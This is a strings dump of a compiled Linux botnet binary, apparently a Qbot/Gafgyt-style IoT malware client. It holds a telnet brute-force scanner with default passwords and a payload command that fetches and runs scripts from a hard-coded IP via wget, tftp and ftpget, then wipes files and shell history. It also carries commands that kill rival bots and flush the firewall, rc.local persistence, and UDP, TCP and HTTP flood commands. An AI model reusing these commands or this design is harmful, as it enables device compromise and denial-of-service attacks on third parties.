PTRh
<suM
<duJ
<xuJ
<XuJ
<uuG
<cuT
<ru3
;E }
L[^_]
L[^_]
\[^_]
L[^_]
L[^_]
L[^_]
[^_]
<	u 
<	u 
E ;E
E ;E
[^_]
[^_]
WVSQ
PRQW
T$(S
UWVS
RRPV
[^_]
T$(S
UWVS
^8QSh
D$(P
D$(P
[^_]
RPh#
t$(j
UWVS
[^_]
UWVS
<rt><w
t7<af
E4tmPh
t$(V
[^_]
UWVS
[^_]
QPRS
^8PSh
t$,V
t$$S
[^_]
UWVS
T$`~
L$,1
D$(%
WVPR
$VRP
?0u,
D$ P
PRQQ
[^_]
tR~P
tB~@=
UWVS
<$u0
\$L9
~	<mtN
:*u4
L$pE
D$`P
T$\)
\[^_]
^8RSh
^8QSh
^8QSh
D$ P
Z %0
D$ P
^8PSh
[^_]
UWVS
[^_]
AIt	
UWVS
[^_]
UWVS
D$gP
[^_]
UWVS
Z[^_]
\$HPh
D$)P
RVShZ
D$ P
D$$Ph
UWVS
t$xSU
t$xj
t$hW
\$DS
T$@XZ
D$TPh
E$RWP
uZRj
t$,U
L[^_]
D$ Pj
D$ Pj
xAPPSh
UWVS
\$Th
D$8P
;-pk
T$ ~
#t$ 
2#D$ 
D$8P
[^_]
UWVS
\$4u
;5lk
t$8R
$9D$
t$8S
\$0PPj
[^_]
[^_]
UWVS
u=9J
;X,tQ
[^_]
UWVS
u<9J
;5lk
SSPQ)
[^_]
uXRh
\$ S
D$,Ph
UWVS
[^_]
UWVS
G;<$|
XZKy
[^_]
UWVS
[^_]
D$ [Xj
}/QQ
uJQQj
t$@h(
D$4j
ET$,
UWVS
 <xu
(<`v
}/C9
D$, D$
t$$h
u%WWSS
ZYSS
Eleele
[^_]
yPPj
T$ j
D$ P
PPSh
UWVS
D$ P
t@;D$xu
D$ P
t$Dj
D$<PR
t$(j
UWVS
[^_]
UWVS
)\$(
[^_]
UWVS
wcQWUR
[^_]
[^_]
UWVS
[^_]
UWVS
u'z%
u?z=
D$Pp
l$61
D$(RP
D$'g
D$'f
\$'t
D$\p
|$d|4
|$'ftt
T$H~@
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
D$7h
T$8XZj
\$PS
D$$;
}3Ph
t$(j
D$$f
D$LPU
D$89
uOQh
XZKj
9\$$}
PCPVU
;\$d|
alula
D$tP
T$|RW
G$;G wn
9D$xu,
t$4C;\$h}
T$<^_
uDQh
XZKj
9\$$}
D$(@
T$(u
tMQh
T$8f
[^_]
UWVS
t>QQh
\$$S
[^_]
t$4j
t$8j
UWVS
T$$v
^8PSh
D$(PV
x:RW
D$(PV
[^_]
PVWS
t+F1
D$ PU
[^_]
UWVS
D$(P
yQGQVh
u+Rj
D$$P
,[^_]
UWV1
D$+1
|<+0u&
D<+t)
|$7W
<[^_]
UWVS
Pj j
D$HP
;D$|v
!WWR
[^_]
UWVS
[^_]
UWVS
D$0t 
PPj#
u,PP
t$4U
[^_]
UWVS1
YRRj.W
D$()
[^_]
UWVS
G;|$,
s^PS
[^_]
198.46.224.100:23
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.46.224.100/Swag.sh; chmod 777 Swag.sh; sh Swag.sh; tftp 198.46.224.100 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 198.46.224.100; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.46.224.100 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf Swag.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;history -c
telnet
root
admin
guest
1234
123456
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
ogin
sername
assword
nvalid
ailed
ncorrect
enied
rror
oodbye
busybox
SCREAMS
Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)
Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)
Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
Mozilla/4.0 (compatible; MSIE 9.0; Windows 98; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.4.53360; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 4.4.58799; WOW64; en-US)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
(null)
/bin/sh
/proc/cpuinfo
BOGOMIPS
PING
:>%$#
%d.%d.%d.%d
gethostbyname
setsockopt
connect
[33mLOGIN PROMPT - %s:%s:%s
>%s.t && cd %s && for a in `ls -a %s`; do >$a; done; >retrieve
>%s.t && cd %s ; >retrieve
enable
REPORT %s:%s:%s
[32mINFECTION SUCCESS - %s:%s:%s
[31mFAILED TO INFECT - %s:%s:%s
enable
reboot
killall -9 TwoFacemipsel; killall -9 TwoFacemips; killall -9 TwoFacesh4; killall -9 TwoFacex86_64; killall -9 TwoFacearmv61; killall -9 TwoFacei686; killall -9 TwoFacepowerpc; killall -9 TwoFacei586; killall -9 TwoFacem86k; killall -9 TwoFacesparc; killall -9 jackmymips; killall -9 jackmymipsel; killall -9 jackmyarmv6l; killall -9 jackmyarmv5l; killall -9 jackmyx86; killall jackmyx86_64; killall -9 mips; killall -9 mipsel; killall -9 x86_64; killall -9 armv5l; killall -9 armv6l; killall -9 arm; killall -9 telmips; killall -9 telmipsel; killall -9 telarmv6l; killall -9 telx86; killall -9 xxb1; killall -9 xxb2; killall -9 xxb3; killall -9 xxb4; killall -9 xxb5; killall -9 xxb6; killall -9 xxb7; killall -9 xxb8; killall -9 xxb9; killall -9 jackmyarv6; killall -9 mips; killall -9 mipsel; killall -9 armv5l; killall -9 armv6l; killall -9 x86_64; killall -9 GHfjfgvj; killall -9 JIPJIPJj; killall -9 jhUOH; killall -9 RYrydry; killall -9 UYyuyioy; killall -9 XDzdfxzf; killall -9 JIPJuipjh; killall -9 DFhxdhdf; killall -9 FDFDHFC; killall -9 FTUdftui; killall -9 busyboxterrorist; killall -9 b1; killall -9 b2; killall -9 b3; killall -9 b4; killall -9 b5; killall -9 b6; killall -9 b7; killall -9 b8; killall -9 b9; killall -9 wget; killall -9 FEUB
kill -9 $(pidof mips); kill -9 $(pidof busybox); kill -9 $(pidof badbox); kill -9 $(pidof mipsel); kill -9 $(pidof armv5l); kill -9 $(pidof armv6l); kill -9 $(pidof armv7l); kill -9 $(pidof sh4); kill -9 $(pidof superh); kill -9 $(pidof x86); kill -9 $(pidof x86_64); kill -9 $(pidof i686); kill -9 $(pidof powerpc); kill -9 $(pidof i586); kill -9 $(pidof m68k); kill -9 $(pidof sparc); kill -9 $(pidof GIHgvhifg); kill -9 $(pidof DGGASDG); kill -9 $(pidof AsdgwD); kill -9 $(pidof KHFGHIV); kill -9 $(pidof rfUYFF); kill -9 $(pidof gjfJHVGHKfgfv); kill -9 $(pidof GJFgjfgjc); kill -9 $(pidof JHFfhhjfilh); kill -9 $(pidof HKugogd); kill -9 $(pidof HKgjlgbjlg); kill -9 $(pidof GHfjfgvj); kill -9 $(pidof JIPJIPJj); kill -9 $(pidof jhUOH); kill -9 $(pidof RYrydry); kill -9 $(pidof UYyuyioy); kill -9 $(pidof XDzdfxzf); kill -9 $(pidof JIPJuipjh); kill -9 $(pidof DFhxdhdf); kill -9 $(pidof FDFDHFC); kill -9 $(pidof FTUdftui)
rm -rf ~/.bash_history
rm -rf /bin/netstat
history -w
killall -9 perl
service iptables stop
/sbin/iptables -F;/sbin/iptables -X
cd /tmp;rm -rf *
history -c
rm -rf *.sh
rm -rf hackz2 hackz3 hackz4 hackz5 hackz6 hackz7 hackz8 hackz9 hackz10 hackz11 hackz12
%s %s HTTP/1.1
Host: %s
User-Agent: %s
Connection: close
Failed opening raw socket.
Failed setting raw headers mode.
Invalid flag "%s"
PONG!
UPDATEBIN
Updating Bins
BOTKILLZ
KILLING YOUR BOATS
SPOOF
SCANNER
SCANNER ON | OFF
SCANNER OFF
SCANNER Starting On -> %s
GETLOCALIP
My IP: %s
RANGE
RANGE <option 0-idk>
Range %d->%d
DOUSPOOF
FUK YEA I DO (%s)
HTTPFLOOD
UDP <target> <port (0 for random)> <time> <netmask> <packet size> <poll interval> <sleep check> <sleep time(ms)>
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
CNC <target> <port> <time>
STD <target> <port> <time>
KILLATTK
Killed %d.
None Killed.
LOLNOGTFO
8.8.8.8
/proc/net/route
	00000000	
BUILD %s
/etc/rc.d/rc.local
/etc/rc.conf
"%s%s"
fork failed
BUILD %s
PONG
aparently im a dupe
%s 2>&1
%s%s%m
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
No address associated with name
Resolver error
/bin/sh
/dev/null
L(knN
 Ainf
/etc/resolv.conf
/etc/config/resolv.conf
nameserver
domain
search
0123456789abcdef
/etc/hosts
/etc/config/hosts
CAk[S
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.comment
libc/sysdeps/linux/i386/crti.S
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
completed.2429
p.2427
__do_global_dtors_aux
object.2482
frame_dummy
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
libc/sysdeps/linux/i386/crtn.S
libc/sysdeps/linux/i386/crt1.S
i.4273
printchar
prints
printi
print
fdopen_pids
hextable
ipState
libc/sysdeps/linux/i386/vfork.S
__syscall_fcntl.c
__syscall_fcntl64.c
_exit.c
chdir.c
close.c
dup2.c
fork.c
getcwd.c
getdtablesize.c
getpagesize.c
getpid.c
getrlimit.c
ioctl.c
kill.c
open.c
pipe.c
prctl.c
read.c
select.c
setsid.c
sigprocmask.c
time.c
waitpid.c
write.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_toupper.c
__errno_location.c
fclose.c
fopen.c
perror.c
printf.c
fprintf.c
snprintf.c
sprintf.c
vsnprintf.c
_fopen.c
_stdio.c
_stdio_streams
__stdio_mutex_initializer.4160
_fixed_buffers
_wcommit.c
vfprintf.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.4370
prefix.4371
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
A Santa lives evil at NASA
spec_flags.4372
qual_chars.4377
spec_chars.4373
spec_ranges.4374
spec_or_mask.4375
spec_and_mask.4376
feof.c
fgets.c
fputs.c
fflush_unlocked.c
fgets_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1330
_string_syserrmsgs.c
bcopy.c
strcasecmp.c
strcasestr.c
strtok.c
next_start.1278
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.2931
inet_ntoa.c
buf.2827
inet_makeaddr.c
gethostbyname.c
buf.5162
h.5161
gethostbyname_r.c
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
realloc.c
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
system.c
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sleep.c
sysconf.c
usleep.c
__uClibc_main.c
__pthread_return_0
__pthread_return_void
__check_one_fd
been_there_done_that.3001
sigaction.c
__restore_rt
__restore
__syscall_error.c
libc/sysdeps/linux/i386/mmap.S
__socketcall.c
__syscall_rt_sigaction.c
clock_getres.c
execve.c
getegid.c
geteuid.c
getgid.c
getuid.c
mremap.c
munmap.c
nanosleep.c
sbrk.c
wait4.c
__C_ctype_tolower.c
errno.c
__h_errno_location.c
wcrtomb.c
wcsrtombs.c
wcsnrtombs.c
_WRITE.c
_fwrite.c
_trans2w.c
_load_inttype.c
_store_inttype.c
_uintmaxtostr.c
_fpmaxtostr.c
exp10_table
fgetc_unlocked.c
memchr.c
memmove.c
mempcpy.c
memrchr.c
strtok_r.c
strpbrk.c
inet_aton.c
dnslookup.c
static_ns
static_id
opennameservers.c
get_hosts_byname_r.c
raise.c
dl-support.c
brk.c
poll.c
fseeko.c
fseeko64.c
_READ.c
_adjust_pos.c
_rfill.c
_trans2r.c
_cs_funcs.c
strcmp.c
strncat.c
rawmemchr.c
strspn.c
strdup.c
ntop.c
inet_pton4
xdigits.3285
inet_ntop4
encodeh.c
decodeh.c
encodeq.c
lengthq.c
decodea.c
read_etc_hosts_r.c
llseek.c
tolower.c
encoded.c
decoded.c
lengthd.c
__fini_array_end
__fini_array_start
__init_array_end
__preinit_array_end
_GLOBAL_OFFSET_TABLE_
__init_array_start
__preinit_array_start
__read_etc_hosts_r
__GI_execve
__libc_sigaction
strcpy
__GI_fcntl64
recvLine
__GI_sigaddset
__socketcall
__GI___ctype_b
__GI_memchr
__GI___glibc_strerror_r
waitpid
__open_nameservers
__GI_fopen
getrlimit
ioctl
_stdio_openlist_use_count
HackerScan6
__GI_initstate_r
__GI_sigaction
strtok_r
__GI___C_ctype_toupper_data
__GI_time
getgid
botkill
sysconf
printf
stdout
random
__GI_strdup
__GI_getpagesize
getdtablesize
__GI_h_errno
contains_fail
__length_question
__GI___ctype_toupper
__GI_strcasecmp
__GI_tolower
recv
connect
spoofTest
__encode_question
__GI___uClibc_fini
numpids
__encode_header
__GI_strncat
sigemptyset
__pthread_mutex_lock
initConnection
__sigdelset
__GI_clock_getres
__uClibc_fini
memrchr
geteuid
inet_pton
__GI_snprintf
__GI_vsnprintf
__GI_setsid
Logins
memmove
sendTCP
__bsd_signal
snprintf
__GI_strpbrk
__stdio_trans2r_o
munmap
__GI_setsockopt
__libc_stack_end
__GI_fclose
__GI_wcsnrtombs
__GI_pipe
_uintmaxtostr
__libc_fcntl
atol
_h_errno
getc_unlocked
B2class
__ctype_b
__GI_random_r
errno
getegid
read_until_response
__GI_sbrk
zprintf
__GI___uClibc_init
usleep
execve
infectedmessage
getpagesize
getpid
__GI_lseek64
setstate_r
fgets
getHost
__libc_getpid
HackerScan1
wildString
dupppp
__xpg_strerror_r
fcntl64
prctl
memcpy
makeRandomStr
__GI_fputs_unlocked
execl
__GI_fgets
perror
sendHTTP
creat
_stdio_openlist_dec_use
sclose
__libc_select
Cclass
_ppfs_init
__GI___C_ctype_toupper
__GI_fgetc_unlocked
originalclass
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
HackerScan4
tolower
getuid
system
__open_etc_hosts
feof
malloc
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
PublicIpNigga
__C_ctype_tolower
random_r
__dso_handle
clock_getres
Cclass3
gethostbyname_r
tcpcsum
reset_telstate
fdpclose
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
__GI_memset
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_herror
__GI_open
__GI_strchr
__searchdomain
sigaddset
__GI_tcgetattr
__environ
mmap
wcsnrtombs
makeIPPacket
sockprintf
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
__GI_fputs
_init
__GI_inet_ntoa_r
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__malloc_state
__GI___C_ctype_b_data
__sigaddset
nanosleep
__GI_send
h_errno
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
environ
__GI_close
getBuild
Server_Botport
fprintf
updatemyshit
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
ourIP
Bclass
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
__raise
setsockopt
bsd_signal
fseek
mremap
__GI_kill
__GI_strcmp
__GI_memmove
sendSTD
setstate
__decode_dotted
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
cleandevice
strcasestr
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
init_rand
rand
signal
read
Aclass
__decode_header
getCores
__GI___h_errno_location
__GI_memcpy
strcoll
wcsrtombs
_stdio_user_locking
Do nine men interpret Nine men I nod
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
StartTheLelz
__GI___C_ctype_b
HackerScan2
realloc
__GI_gethostbyname_r
__GI_strncpy
__libc_send
__GI___xpg_strerror_r
currentServer
__GI___C_ctype_tolower
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
fork
__stdio_rfill
strncat
gotIP
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__GI_mremap
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
UserAgents
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
main
__glibc_strerror_r
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
ntohs
sendUDP
God A red nugget A fat egg under a dog
inet_ntoa
tcgetattr
__C_ctype_tolower_data
time
__libc_system
__GI_abort
poll
fdpopen
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
herror
strcmp
infected
advances2
__nameserver
data_start
HackerScan
__GI_sysconf
infect
__h_errno_location
matchPrompt
getcwd
__C_ctype_b_data
__GI_inet_pton
gethostbyname
